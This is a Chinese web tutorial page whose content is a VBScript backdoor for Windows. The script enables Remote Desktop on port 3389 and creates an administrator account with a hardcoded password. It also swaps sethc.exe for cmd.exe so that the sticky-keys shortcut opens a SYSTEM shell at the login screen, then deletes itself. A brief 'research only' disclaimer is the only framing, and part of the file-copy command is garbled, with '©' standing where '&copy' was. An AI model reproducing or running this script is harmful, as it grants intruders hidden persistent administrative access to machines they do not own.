鸿 网 互 联 www.68idc.cn

当前位置 : 服务器租用 > 网站制作教程 > vbs > >

可自删除开启3389创建用户粘滞键后门的vbs

来源:互联网 作者:佚名 时间:2015-10-15 13:36
开启 3389 创建 用户 粘滞键后门,作研究使用,请勿违法 on error resume next const HKEY_LOCAL_MACHINE = H80000002 strComputer = . Set StdOut = WScript.StdOut Set oReg=GetObject(winmgmts:{impersonationLevel=impersonate}!\\ _ strComputer \root\


开启3389创建用户粘滞键后门,作研究使用,请勿违法

on error resume next

const HKEY_LOCAL_MACHINE = &H80000002

strComputer = "."

Set StdOut = WScript.StdOut

Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_

strComputer & "\root\default:StdRegProv")

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"

strValueName = "fDenyTSConnections"

dwValue = 0

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"

strValueName = "PortNumber"

dwValue = 3389

oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue

on error resume next

dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath

On Error Resume Next

Dim obj, success

Set obj = CreateObject("WScript.Shell")

success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F© %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe© %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)

CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
 

标签分类: 系统入侵

网友评论
<